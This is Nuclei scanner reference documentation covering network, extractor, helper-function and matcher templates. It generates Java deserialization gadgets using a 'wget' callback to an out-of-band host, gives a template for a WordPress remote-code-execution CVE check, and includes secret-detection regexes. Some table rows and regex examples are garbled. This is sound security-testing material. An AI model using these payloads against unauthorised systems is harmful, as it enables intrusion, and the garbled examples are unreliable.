Nuclei can act as an automatable **Netcat**, allowing users to send bytes across the wire and receive them, while providing matching and extracting capabilities on the response.
Network Requests start with a **network** block which specifies the start of the requests for the template.
```yaml
# Start the requests for the template right here
tcp:
```
### Inputs
First thing in the request is **inputs**. Inputs are the data that will be sent to the server, and optionally any data to read from the server.
At its most simple, just specify a string, and it will be sent across the network socket.
```yaml
# inputs is the list of inputs to send to the server
inputs:
- data: "TEST\r\n"
```
You can also send hex encoded text that will be first decoded and the raw bytes will be sent to the server.
```yaml
inputs:
- data: "50494e47"
type: hex
- data: "\r\n"
```
Helper function expressions can also be defined in input and will be first evaluated and then sent to the server. The last Hex Encoded example can be sent with helper functions this way -
```yaml
inputs:
- data: 'hex_decode("50494e47")\r\n'
```
One last thing that can be done with inputs is reading data from the socket. Specifying `read-size` with a non-zero value will do the trick. You can also assign the read data some name, so matching can be done on that part.
```yaml
inputs:
- read-size: 8
```
Example with reading a number of bytes, and only matching on them.
```yaml
inputs:
- read-size: 8
name: prefix
...
matchers:
- type: word
part: prefix
words:
- "CAFEBABE"
```
Multiple steps can be chained together in sequence to do network reading / writing.
### Host
The next part of the requests is the **host** to connect to. Dynamic variables can be placed in the path to modify its value on runtime. Variables start with `{{` and end with `}}` and are case-sensitive.
1. **Hostname** - variable is replaced by the hostname provided on command line.
An example name value:
```yaml
host:
- "{{Hostname}}"
```
Nuclei can also do TLS connection to the target server. Just add `tls://` as prefix before the **Hostname** and you're good to go.
```yaml
host:
- "tls://{{Hostname}}"
```
If a port is specified in the host, the user supplied port is ignored and the template port takes precedence.
### Port
Starting from Nuclei v2.9.15, a new field called `port` has been introduced in network templates. This field allows users to specify the port separately instead of including it in the host field.
Previously, if you wanted to write a network template for an exploit targeting SSH, you would have to specify both the hostname and the port in the host field, like this:
```yaml
host:
- "{{Hostname}}"
- "{{Host}}:22"
```
In the above example, two network requests are sent: one to the port specified in the input/target, and another to the default SSH port (22).
The reason behind introducing the port field is to provide users with more flexibility when running network templates on both default and non-default ports. For example, if a user knows that the SSH service is running on a non-default port of 2222 (after performing a port scan with service discovery), they can simply run:
```bash
$ nuclei -u scanme.sh:2222 -id xyz-ssh-exploit
```
In this case, Nuclei will use port 2222 instead of the default port 22. If the user doesn't specify any port in the input, port 22 will be used by default. However, this approach may not be straightforward to understand and can generate warnings in logs since one request is expected to fail.
Another issue with the previous design of writing network templates is that requests can be sent to unexpected ports. For example, if a web service is running on port 8443 and the user runs:
```bash
$ nuclei -u scanme.sh:8443
```
In this case, `xyz-ssh-exploit` template will send one request to `scanme.sh:22` and another request to `scanme.sh:8443`, which may return unexpected responses and eventually result in errors. This is particularly problematic in automation scenarios.
To address these issues while maintaining the existing functionality, network templates can now be written in the following way:
```yaml
host:
- "{{Hostname}}"
port: 22
```
In this new design, the functionality to run templates on non-standard ports will still exist, except for the default reserved ports (`80`, `443`, `8080`, `8443`, `8081`, `53`). Additionally, the list of default reserved ports can be customized by adding a new field called exclude-ports:
```yaml
exclude-ports: 80,443
```
When `exclude-ports` is used, the default reserved ports list will be overwritten. This means that if you want to run a network template on port `80`, you will have to explicitly specify it in the port field.
Starting from Nuclei v3.1.0 `port` field supports comma seperated values and multi ports can be specified in the port field. For example, if you want to run a network template on port `5432` and `5433`, you can specify it in the port field like this:
```yaml
port: 5432,5433
```
In this case, Nuclei will first check if port is open from list and run template only on open ports
#### Matchers / Extractor Parts
Valid `part` values supported by **Network** protocol for Matchers / Extractor are -
| Value | Description |
| ---------------- | ----------------------------------- |
| request | Network Request |
| data | Final Data Read From Network Socket |
| raw / body / all | All Data received from Socket |
### **Example Network Template**
The final example template file for a `hex` encoded input to detect MongoDB running on servers with working matchers is provided below.
```yaml
id: input-expressions-mongodb-detect
info:
name: Input Expression MongoDB Detection
author: pdteam
severity: info
reference: https://github.com/orleven/Tentacle
tcp:
- inputs:
- data: "{{hex_decode('3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000')}}"
host:
- "{{Hostname}}"
port: 27017
read-size: 2048
matchers:
- type: word
words:
- "logicalSessionTimeout"
- "localTime"
```
More complete examples are provided [here](/templates/protocols/network-examples).
# Extractors
Source: https://docs.projectdiscovery.io/templates/reference/extractors
Review details on extractors for Nuclei
Extractors can be used to extract and display in results a match from the response returned by a module.
### Types
Multiple extractors can be specified in a request. As of now we support five type of extractors.
1. **regex** - Extract data from response based on a Regular Expression.
2. **kval** - Extract `key: value`/`key=value` formatted data from Response Header/Cookie
3. **json** - Extract data from JSON based response in JQ like syntax.
4. **xpath** - Extract xpath based data from HTML Response
5. **dsl** - Extract data from the response based on a DSL expressions.
### Regex Extractor
Example extractor for HTTP Response body using **regex** -
```yaml
extractors:
- type: regex # type of the extractor
part: body # part of the response (header,body,all)
regex:
- "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" # regex to use for extraction.
```
### Kval Extractor
A **kval** extractor example to extract `content-type` header from HTTP Response.
```yaml
extractors:
- type: kval # type of the extractor
kval:
- content_type # header/cookie value to extract from response
```
Note that `content-type` has been replaced with `content_type` because **kval** extractor does not accept dash (`-`) as input and must be substituted with underscore (`_`).
### JSON Extractor
A **json** extractor example to extract value of `id` object from JSON block.
```yaml
- type: json # type of the extractor
part: body
name: user
json:
- '.[] | .id' # JQ like syntax for extraction
```
For more details about JQ - [https://github.com/stedolan/jq](https://github.com/stedolan/jq)
### Xpath Extractor
A **xpath** extractor example to extract value of `href` attribute from HTML response.
```yaml
extractors:
- type: xpath # type of the extractor
attribute: href # attribute value to extract (optional)
xpath:
- '/html/body/div/p[2]/a' # xpath value for extraction
```
With a simple [copy paste in browser](https://www.scientecheasy.com/2020/07/find-xpath-chrome.html/), we can get the **xpath** value form any web page content.
### DSL Extractor
A **dsl** extractor example to extract the effective `body` length through the `len` helper function from HTTP Response.
```yaml
extractors:
- type: dsl # type of the extractor
dsl:
- len(body) # dsl expression value to extract from response
```
### Dynamic Extractor
Extractors can be used to capture Dynamic Values on runtime while writing Multi-Request templates. CSRF Tokens, Session Headers, etc. can be extracted and used in requests. This feature is only available in RAW request format.
Example of defining a dynamic extractor with name `api` which will capture a regex based pattern from the request.
```yaml
extractors:
- type: regex
name: api
part: body
internal: true # Required for using dynamic variables
regex:
- "(?m)[0-9]{3,10}\\.[0-9]+"
```
The extracted value is stored in the variable **api**, which can be utilised in any section of the subsequent requests.
If you want to use extractor as a dynamic variable, you must use `internal: true` to avoid printing extracted values in the terminal.
An optional regex **match-group** can also be specified for the regex for more complex matches.
```yaml
extractors:
- type: regex # type of extractor
name: csrf_token # defining the variable name
part: body # part of response to look for
# group defines the matching group being used.
# In GO the "match" is the full array of all matches and submatches
# match[0] is the full match
# match[n] is the submatches. Most often we'd want match[1] as depicted below
group: 1
regex:
- ''
```
The above extractor with name `csrf_token` will hold the value extracted by `([[:alnum:]]{16})` as `abcdefgh12345678`.
If no group option is provided with this regex, the above extractor with name `csrf_token` will hold the full match (by ``) as ``.
### Reusable Dynamic Extractors
With Nuclei v3.1.4 you can now reuse dynamic extracted value (ex: csrf\_token in above example) immediately in next extractors and is by default available in subsequent requests
Example:
```
id: basic-raw-example
info:
name: Test RAW Template
author: pdteam
severity: info
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: title
group: 1
regex:
- '(.*)<\/title>'
internal: true
- type: dsl
dsl:
- '"Title is " + title'
```
# Helper Functions
Source: https://docs.projectdiscovery.io/templates/reference/helper-functions
Review details on helper functions for Nuclei
Here is the list of all supported helper functions can be used in the RAW requests / Network requests.
| Helper function | Description | Example | Output |
| ---------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| aes\_gcm(key, plaintext interface{}) \[]byte | AES GCM encrypts a string with key | `{{hex_encode(aes_gcm("AES256Key-32Characters1234567890", "exampleplaintext"))}}` | `ec183a153b8e8ae7925beed74728534b57a60920c0b009eaa7608a34e06325804c096d7eebccddea3e5ed6c4` |
| base64(src interface{}) string | Base64 encodes a string | `base64("Hello")` | `SGVsbG8=` |
| base64\_decode(src interface{}) \[]byte | Base64 decodes a string | `base64_decode("SGVsbG8=")` | `Hello` |
| base64\_py(src interface{}) string | Encodes string to base64 like python (with new lines) | `base64_py("Hello")` | `SGVsbG8=\n` |
| bin\_to\_dec(binaryNumber number \| string) float64 | Transforms the input binary number into a decimal format | `bin_to_dec("0b1010")` `bin_to_dec(1010)` | `10` |
| compare\_versions(versionToCheck string, constraints ...string) bool | Compares the first version argument with the provided constraints | `compare_versions('v1.0.0', '\>v0.0.1', '\`date_time("%Y-%M-%D %H:%m", 1654870680)` `date_time("2006-01-02 15:04", unix_time())` | `2022-06-10 14:18` |
| dec\_to\_hex(number number \| string) string | Transforms the input number into hexadecimal format | `dec_to_hex(7001)"` | `1b59` |
| ends\_with(str string, suffix ...string) bool | Checks if the string ends with any of the provided substrings | `ends_with("Hello", "lo")` | `true` |
| generate\_java\_gadget(gadget, cmd, encoding interface{}) string | Generates a Java Deserialization Gadget | `generate_java_gadget("dns", "{{interactsh-url}}", "base64")` | `rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAAHQAAHEAfgAFdAAFcHh0ACpjYWhnMmZiaW41NjRvMGJ0MHRzMDhycDdlZXBwYjkxNDUub2FzdC5mdW54` |
| generate\_jwt(json, algorithm, signature, unixMaxAge) \[]byte | Generates a JSON Web Token (JWT) using the claims provided in a JSON string, the signature, and the specified algorithm | `generate_jwt("{\"name\":\"John Doe\",\"foo\":\"bar\"}", "HS256", "hello-world")` | `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJuYW1lIjoiSm9obiBEb2UifQ.EsrL8lIcYJR_Ns-JuhF3VCllCP7xwbpMCCfHin_WT6U` |
| gzip(input string) string | Compresses the input using GZip | `base64(gzip("Hello"))` | `+H4sIAAAAAAAA//JIzcnJBwQAAP//gonR9wUAAAA=` |
| gzip\_decode(input string) string | Decompresses the input using GZip | `gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000"))` | `Hello` |
| hex\_decode(input interface{}) \[]byte | Hex decodes the given input | `hex_decode("6161")` | `aa` |
| hex\_encode(input interface{}) string | Hex encodes the given input | `hex_encode("aa")` | `6161` |
| hex\_to\_dec(hexNumber number \| string) float64 | Transforms the input hexadecimal number into decimal format | `hex_to_dec("ff")` `hex_to_dec("0xff")` | `255` |
| hmac(algorithm, data, secret) string | hmac function that accepts a hashing function type with data and secret | `hmac("sha1", "test", "scrt")` | `8856b111056d946d5c6c92a21b43c233596623c6` |
| html\_escape(input interface{}) string | HTML escapes the given input | `html_escape("\test\")` | `<body>test</body>` |
| html\_unescape(input interface{}) string | HTML un-escapes the given input | `html_unescape("<body>test</body>")` | `\test\` |
| join(separator string, elements ...interface{}) string | Joins the given elements using the specified separator | `join("_", 123, "hello", "world")` | `123_hello_world` |
| json\_minify(json) string | Minifies a JSON string by removing unnecessary whitespace | `json_minify("{ \"name\": \"John Doe\", \"foo\": \"bar\" }")` | `{"foo":"bar","name":"John Doe"}` |
| json\_prettify(json) string | Prettifies a JSON string by adding indentation | `json_prettify("{\"foo\":\"bar\",\"name\":\"John Doe\"}")` | `{\n \"foo\": \"bar\",\n \"name\": \"John Doe\"\n}` |
| len(arg interface{}) int | Returns the length of the input | `len("Hello")` | `5` |
| line\_ends\_with(str string, suffix ...string) bool | Checks if any line of the string ends with any of the provided substrings | `line_ends_with("Hello\nHi", "lo")` | `true` |
| line\_starts\_with(str string, prefix ...string) bool | Checks if any line of the string starts with any of the provided substrings | `line_starts_with("Hi\nHello", "He")` | `true` |
| md5(input interface{}) string | Calculates the MD5 (Message Digest) hash of the input | `md5("Hello")` | `8b1a9953c4611296a827abf8c47804d7` |
| mmh3(input interface{}) string | Calculates the MMH3 (MurmurHash3) hash of an input | `mmh3("Hello")` | `316307400` |
| oct\_to\_dec(octalNumber number \| string) float64 | Transforms the input octal number into a decimal format | `oct_to_dec("0o1234567")` `oct_to_dec(1234567)` | `342391` |
| print\_debug(args ...interface{}) | Prints the value of a given input or expression. Used for debugging. | `print_debug(1+2, "Hello")` | `3 Hello` |
| rand\_base(length uint, optionalCharSet string) string | Generates a random sequence of given length string from an optional charset (defaults to letters and numbers) | `rand_base(5, "abc")` | `caccb` |
| rand\_char(optionalCharSet string) string | Generates a random character from an optional character set (defaults to letters and numbers) | `rand_char("abc")` | `a` |
| rand\_int(optionalMin, optionalMax uint) int | Generates a random integer between the given optional limits (defaults to 0 - MaxInt32) | `rand_int(1, 10)` | `6` |
| rand\_text\_alpha(length uint, optionalBadChars string) string | Generates a random string of letters, of given length, excluding the optional cutset characters | `rand_text_alpha(10, "abc")` | `WKozhjJWlJ` |
| rand\_text\_alphanumeric(length uint, optionalBadChars string) string | Generates a random alphanumeric string, of given length without the optional cutset characters | `rand_text_alphanumeric(10, "ab12")` | `NthI0IiY8r` |
| rand\_ip(cidr ...string) string | Generates a random IP address | `rand_ip("192.168.0.0/24")` | `192.168.0.171` |
| rand\_text\_numeric(length uint, optionalBadNumbers string) string | Generates a random numeric string of given length without the optional set of undesired numbers | `rand_text_numeric(10, 123)` | `0654087985` |
| regex(pattern, input string) bool | Tests the given regular expression against the input string | `regex("H([a-z]+)o", "Hello")` | `true` |
| remove\_bad\_chars(input, cutset interface{}) string | Removes the desired characters from the input | `remove_bad_chars("abcd", "bc")` | `ad` |
| repeat(str string, count uint) string | Repeats the input string the given amount of times | `repeat("../", 5)` | `../../../../../` |
| replace(str, old, new string) string | Replaces a given substring in the given input | `replace("Hello", "He", "Ha")` | `Hallo` |
| replace\_regex(source, regex, replacement string) string | Replaces substrings matching the given regular expression in the input | `replace_regex("He123llo", "(\\d+)", "")` | `Hello` |
| reverse(input string) string | Reverses the given input | `reverse("abc")` | `cba` |
| sha1(input interface{}) string | Calculates the SHA1 (Secure Hash 1) hash of the input | `sha1("Hello")` | `f7ff9e8b7bb2e09b70935a5d785e0cc5d9d0abf0` |
| sha256(input interface{}) string | Calculates the SHA256 (Secure Hash 256) hash of the input | `sha256("Hello")` | `185f8db32271fe25f561a6fc938b2e264306ec304eda518007d1764826381969` |
| starts\_with(str string, prefix ...string) bool | Checks if the string starts with any of the provided substrings | `starts_with("Hello", "He")` | `true` |
| to\_lower(input string) string | Transforms the input into lowercase characters | `to_lower("HELLO")` | `hello` |
| to\_unix\_time(input string, layout string) int | Parses a string date time using default or user given layouts, then returns its Unix timestamp | `to_unix_time("2022-01-13T16:30:10+00:00")` `to_unix_time("2022-01-13 16:30:10")` `to_unix_time("13-01-2022 16:30:10", "02-01-2006 15:04:05")` | `1642091410` |
| to\_upper(input string) string | Transforms the input into uppercase characters | `to_upper("hello")` | `HELLO` |
| trim(input, cutset string) string | Returns a slice of the input with all leading and trailing Unicode code points contained in cutset removed | `trim("aaaHelloddd", "ad")` | `Hello` |
| trim\_left(input, cutset string) string | Returns a slice of the input with all leading Unicode code points contained in cutset removed | `trim_left("aaaHelloddd", "ad")` | `Helloddd` |
| trim\_prefix(input, prefix string) string | Returns the input without the provided leading prefix string | `trim_prefix("aaHelloaa", "aa")` | `Helloaa` |
| trim\_right(input, cutset string) string | Returns a string, with all trailing Unicode code points contained in cutset removed | `trim_right("aaaHelloddd", "ad")` | `aaaHello` |
| trim\_space(input string) string | Returns a string, with all leading and trailing white space removed, as defined by Unicode | `trim_space(" Hello ")` | `"Hello"` |
| trim\_suffix(input, suffix string) string | Returns input without the provided trailing suffix string | `trim_suffix("aaHelloaa", "aa")` | `aaHello` |
| unix\_time(optionalSeconds uint) float64 | Returns the current Unix time (number of seconds elapsed since January 1, 1970 UTC) with the added optional seconds | `unix_time(10)` | `1639568278` |
| url\_decode(input string) string | URL decodes the input string | `url_decode("https:%2F%2Fprojectdiscovery.io%3Ftest=1")` | `https://projectdiscovery.io?test=1` |
| url\_encode(input string) string | URL encodes the input string | `url_encode("https://projectdiscovery.io/test?a=1")` | `https%3A%2F%2Fprojectdiscovery.io%2Ftest%3Fa%3D1` |
| wait\_for(seconds uint) | Pauses the execution for the given amount of seconds | `wait_for(10)` | `true` |
| zlib(input string) string | Compresses the input using Zlib | `base64(zlib("Hello"))` | `eJzySM3JyQcEAAD//wWMAfU=` |
| zlib\_decode(input string) string | Decompresses the input using Zlib | `zlib_decode(hex_decode("789cf248cdc9c907040000ffff058c01f5"))` | `Hello` |
| resolve(host string, format string) string | Resolves a host using a dns type that you define | `resolve("localhost",4)` | `127.0.0.1` |
| ip\_format(ip string, format string) string | It takes an input ip and converts it to another format according to this [legend](https://github.com/projectdiscovery/mapcidr/wiki/IP-Format-Index), the second parameter indicates the conversion index and must be between 1 and 11 | `ip_format("127.0.0.1", 3)` | `0177.0.0.01` |
## Deserialization helper functions
Nuclei allows payload generation for a few common gadget from [ysoserial](https://github.com/frohoff/ysoserial).
**Supported Payload:**
* `dns` (URLDNS)
* `commons-collections3.1`
* `commons-collections4.0`
* `jdk7u21`
* `jdk8u20`
* `groovy1`
**Supported encodings:**
* `base64` (default)
* `gzip-base64`
* `gzip`
* `hex`
* `raw`
**Deserialization helper function format:**
```yaml
{ { generate_java_gadget(payload, cmd, encoding } }
```
**Deserialization helper function example:**
```yaml
{{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}
```
## JSON helper functions
Nuclei allows manipulate JSON strings in different ways, here is a list of its functions:
* `generate_jwt`, to generates a JSON Web Token (JWT) using the claims provided in a JSON string, the signature, and the specified algorithm.
* `json_minify`, to minifies a JSON string by removing unnecessary whitespace.
* `json_prettify`, to prettifies a JSON string by adding indentation.
**Examples**
**`generate_jwt`**
To generate a JSON Web Token (JWT), you have to supply the JSON that you want to sign, *at least*.
Here is a list of supported algorithms for generating JWTs with `generate_jwt` function *(case-insensitive)*:
* `HS256`
* `HS384`
* `HS512`
* `RS256`
* `RS384`
* `RS512`
* `PS256`
* `PS384`
* `PS512`
* `ES256`
* `ES384`
* `ES512`
* `EdDSA`
* `NONE`
Empty string ("") also means `NONE`.
Format:
```yaml
{ { generate_jwt(json, algorithm, signature, maxAgeUnix) } }
```
> Arguments other than `json` are optional.
Example:
```yaml
variables:
json: | # required
{
"foo": "bar",
"name": "John Doe"
}
alg: "HS256" # optional
sig: "this_is_secret" # optional
age: '{{to_unix_time("2032-12-30T16:30:10+00:00")}}' # optional
jwt: '{{generate_jwt(json, "{{alg}}", "{{sig}}", "{{age}}")}}'
```
> The `maxAgeUnix` argument is to set the expiration `"exp"` JWT standard claim, as well as the `"iat"` claim when you call the function.
**`json_minify`**
Format:
```yaml
{ { json_minify(json) } }
```
Example:
```yaml
variables:
json: |
{
"foo": "bar",
"name": "John Doe"
}
minify: "{{json_minify(json}}"
```
`minify` variable output:
```json
{ "foo": "bar", "name": "John Doe" }
```
**`json_prettify`**
Format:
```yaml
{ { json_prettify(json) } }
```
Example:
```yaml
variables:
json: '{"foo":"bar","name":"John Doe"}'
pretty: "{{json_prettify(json}}"
```
`pretty` variable output:
```json
{
"foo": "bar",
"name": "John Doe"
}
```
**`resolve`**
Format:
```yaml
{ { resolve(host, format) } }
```
Here is a list of formats available for dns type:
* `4` or `a`
* `6` or `aaaa`
* `cname`
* `ns`
* `txt`
* `srv`
* `ptr`
* `mx`
* `soa`
* `caa`
## Examples
For more examples, see the [helper function examples](/templates/reference/helper-functions-examples)
# Javascript Helper Functions
Source: https://docs.projectdiscovery.io/templates/reference/js-helper-functions
Available JS Helper Functions that can be used in global js runtime & protocol specific helpers.
## Javascript Runtime
| Name | Description | Signatures |
| -------------- | -------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------- |
| atob | Base64 decodes a given string | `atob(string) string` |
| btoa | Base64 encodes a given string | `bota(string) string` |
| to\_json | Converts a given object to JSON | `to_json(any) object` |
| dump\_json | Prints a given object as JSON in console | `dump_json(any)` |
| to\_array | Sets/Updates objects prototype to array to enable Array.XXX functions | `to_array(any) array` |
| hex\_to\_ascii | Converts a given hex string to ascii | `hex_to_ascii(string) string` |
| Rand | Rand returns a random byte slice of length n | `Rand(n int) []byte` |
| RandInt | RandInt returns a random int | `RandInt() int` |
| log | log prints given input to stdout with \[JS] prefix for debugging purposes | `log(msg string)`, `log(msg map[string]interface{})` |
| getNetworkPort | getNetworkPort registers defaultPort and returns defaultPort if it is a colliding port with other protocols | `getNetworkPort(port string, defaultPort string) string` |
| isPortOpen | isPortOpen checks if given TCP port is open on host. timeout is optional and defaults to 5 seconds | `isPortOpen(host string, port string, [timeout int]) bool` |
| isUDPPortOpen | isUDPPortOpen checks if the given UDP port is open on the host. Timeout is optional and defaults to 5 seconds. | `isUDPPortOpen(host string, port string, [timeout int]) bool` |
| ToBytes | ToBytes converts given input to byte slice | `ToBytes(...interface{}) []byte` |
| ToString | ToString converts given input to string | `ToString(...interface{}) string` |
| Export | Converts a given value to a string and is appended to output of script | `Export(value any)` |
| ExportAs | Exports given value with specified key and makes it available in DSL and response | `ExportAs(key string,value any)` |
## Template Flow
| Name | Description | Signatures |
| ------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------- |
| log | Logs a given object/message to stdout (only for debugging purposes) | `log(obj any) any` |
| iterate | Normalizes and Iterates over all arguments (can be a string,array,null etc) and returns an array of objects\nNote: If the object type is unknown(i.e could be a string or array) iterate should be used and it will always return an array of strings | `iterate(...any) []any` |
| Dedupe | De-duplicates given values and returns a new array of unique values | `new Dedupe()` |
## Code Protocol
| Name | Description | Signatures |
| --------- | --------------------------------------------------- | ------------------ |
| OS | OS returns the current OS | `OS() string` |
| IsLinux | IsLinux checks if the current OS is Linux | `IsLinux() bool` |
| IsWindows | IsWindows checks if the current OS is Windows | `IsWindows() bool` |
| IsOSX | IsOSX checks if the current OS is OSX | `IsOSX() bool` |
| IsAndroid | IsAndroid checks if the current OS is Android | `IsAndroid() bool` |
| IsIOS | IsIOS checks if the current OS is IOS | `IsIOS() bool` |
| IsJS | IsJS checks if the current OS is JS | `IsJS() bool` |
| IsFreeBSD | IsFreeBSD checks if the current OS is FreeBSD | `IsFreeBSD() bool` |
| IsOpenBSD | IsOpenBSD checks if the current OS is OpenBSD | `IsOpenBSD() bool` |
| IsSolaris | IsSolaris checks if the current OS is Solaris | `IsSolaris() bool` |
| Arch | Arch returns the current architecture | `Arch() string` |
| Is386 | Is386 checks if the current architecture is 386 | `Is386() bool` |
| IsAmd64 | IsAmd64 checks if the current architecture is Amd64 | `IsAmd64() bool` |
| IsARM | IsArm checks if the current architecture is Arm | `IsARM() bool` |
| IsARM64 | IsArm64 checks if the current architecture is Arm64 | `IsARM64() bool` |
| IsWasm | IsWasm checks if the current architecture is Wasm | `IsWasm() bool` |
## JavaScript Protocol
| Name | Description | Signatures |
| ------------- | ---------------------------------------------------------------------------------------------- | ------------------------------------ |
| set | set variable from init code. this function is available in init code block only | `set(string, interface{})` |
| updatePayload | update/override any payload from init code. this function is available in init code block only | `updatePayload(string, interface{})` |
# Matchers
Source: https://docs.projectdiscovery.io/templates/reference/matchers
Review details on matchers for Nuclei
Matchers allow different type of flexible comparisons on protocol responses. They are what makes nuclei so powerful, checks are very simple to write and multiple checks can be added as per need for very effective scanning.
### Types
Multiple matchers can be specified in a request. There are basically 7 types of matchers:
| Matcher Type | Part Matched |
| ------------ | --------------------------- |
| status | Integer Comparisons of Part |
| size | Content Length of Part |
| word | Part for a protocol |
| regex | Part for a protocol |
| binary | Part for a protocol |
| dsl | Part for a protocol |
| xpath | Part for a protocol |
To match status codes for responses, you can use the following syntax.
```yaml
matchers:
# Match the status codes
- type: status
# Some status codes we want to match
status:
- 200
- 302
```
To match binary for hexadecimal responses, you can use the following syntax.
```yaml
matchers:
- type: binary
binary:
- "504B0304" # zip archive
- "526172211A070100" # RAR archive version 5.0
- "FD377A585A0000" # xz tar.xz archive
condition: or
part: body
```
Matchers also support hex encoded data which will be decoded and matched.
```yaml
matchers:
- type: word
encoding: hex
words:
- "50494e47"
part: body
```
**Word** and **Regex** matchers can be further configured depending on the needs of the users.
**XPath** matchers use XPath queries to match XML and HTML responses. If the XPath query returns any results, it's considered a match.
```yaml
matchers:
- type: xpath
part: body
xpath:
- "/html/head/title[contains(text(), 'Example Domain')]"
```
Complex matchers of type **dsl** allows building more elaborate expressions with helper functions. These function allow access to Protocol Response which contains variety of data based on each protocol. See protocol specific documentation to learn about different returned results.
```yaml
matchers:
- type: dsl
dsl:
- "len(body)<1024 && status_code==200" # Body length less than 1024 and 200 status code
- "contains(toupper(body), md5(cookie))" # Check if the MD5 sum of cookies is contained in the uppercase body
```
Every part of a Protocol response can be matched with DSL matcher. Some examples -
| Response Part | Description | Example |
| --------------- | ----------------------------------------------- | ----------------------- |
| content\_length | Content-Length Header | content\_length >= 1024 |
| status\_code | Response Status Code | status\_code==200 |
| all\_headers | Unique string containing all headers | len(all\_headers) |
| body | Body as string | len(body) |
| header\_name | Lowercase header name with `-` converted to `_` | len(user\_agent) |
| raw | Headers + Response | len(raw) |
### Conditions
Multiple words and regexes can be specified in a single matcher and can be configured with different conditions like **AND** and **OR**.
1. **AND** - Using AND conditions allows matching of all the words from the list of words for the matcher. Only then will the request be marked as successful when all the words have been matched.
2. **OR** - Using OR conditions allows matching of a single word from the list of matcher. The request will be marked as successful when even one of the word is matched for the matcher.
### Matched Parts
Multiple parts of the response can also be matched for the request, default matched part is `body` if not defined.
Example matchers for HTTP response body using the AND condition:
```yaml
matchers:
# Match the body word
- type: word
# Some words we want to match
words:
- "[core]"
- "[config]"
# Both words must be found in the response body
condition: and
# We want to match request body (default)
part: body
```
Similarly, matchers can be written to match anything that you want to find in the response body allowing unlimited creativity and extensibility.
### Negative Matchers
All types of matchers also support negative conditions, mostly useful when you look for a match with an exclusions. This can be used by adding `negative: true` in the **matchers** block.
Here is an example syntax using `negative` condition, this will return all the URLs not having `PHPSESSID` in the response header.
```yaml
matchers:
- type: word
words:
- "PHPSESSID"
part: header
negative: true
```
### Multiple Matchers
Multiple matchers can be used in a single template to fingerprint multiple conditions with a single request.
Here is an example of syntax for multiple matchers.
```yaml
matchers:
- type: word
name: php
words:
- "X-Powered-By: PHP"
- "PHPSESSID"
part: header
- type: word
name: node
words:
- "Server: NodeJS"
- "X-Powered-By: nodejs"
condition: or
part: header
- type: word
name: python
words:
- "Python/2."
- "Python/3."
condition: or
part: header
```
### Matchers Condition
While using multiple matchers the default condition is to follow OR operation in between all the matchers, AND operation can be used to make sure return the result if all matchers returns true.
```yaml
matchers-condition: and
matchers:
- type: word
words:
- "X-Powered-By: PHP"
- "PHPSESSID"
condition: or
part: header
- type: word
words:
- "PHP"
part: body
```
### Internal Matchers
When writing multi-protocol or `flow` based templates, there might be a case where we need to validate/match first request then proceed to next request and a good example of this is [`CVE-2023-6553`](https://github.com/projectdiscovery/nuclei-templates/blob/c5be73e328ebd9a0c122ea0324f60bbdd7eb940d/http/cves/2023/CVE-2023-6553.yaml#L21)
In this template, we are first checking if target is actual using `Backup Migration` plugin using matchers and if true then proceed to next request with help of `flow`
But this will print two results, one for each request match since we are using the first request matchers as a pre-condition to proceed to next request we can mark it as internal using `internal: true` in the matchers block.
```yaml
id: CVE-2023-6553
info:
name: Worpress Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution
author: FLX
severity: critical
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Backup Migration")'
condition: and
internal: true # <- updated logic (this will skip printing this event/result)
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php"
headers:
Content-Dir: "{{rand_text_alpha(10)}}"
matchers:
- type: dsl
dsl:
- 'len(body) == 0'
- 'status_code == 200'
- '!contains(body, "Incorrect parameters")'
condition: and
```
### Global Matchers
Global matchers are essentially `matchers` that apply globally across all HTTP responses received from running other templates. This makes them super useful for things like passive detection, fingerprinting, spotting errors, WAF detection, identifying unusual behaviors, or even catching secrets and information leaks. By setting `global-matchers` to **true**, you're enabling the template to automatically match events triggered by other templates without having to configure them individually.
* Global matchers only work with [HTTP-protocol-based](/templates/protocols/http) templates.
* When global matchers are enabled, no requests defined in the template will be sent.
* This feature is not limited to `matchers`; you can also define `extractors` in a global matchers template.
Let's look at a quick example of how this works:
```yaml
# http-template-with-global-matchers.yaml
http:
- global-matchers: true
matchers-condition: or
matchers:
- type: regex
name: asymmetric_private_key
regex:
- '-----BEGIN ((EC|PGP|DSA|RSA|OPENSSH) )?PRIVATE KEY( BLOCK)?-----'
part: body
- type: regex
name: slack_webhook
regex:
- >-
https://hooks.slack.com/services/T[a-zA-Z0-9_]{8,10}/B[a-zA-Z0-9_]{8,12}/[a-zA-Z0-9_]{23,24}
part: body
```
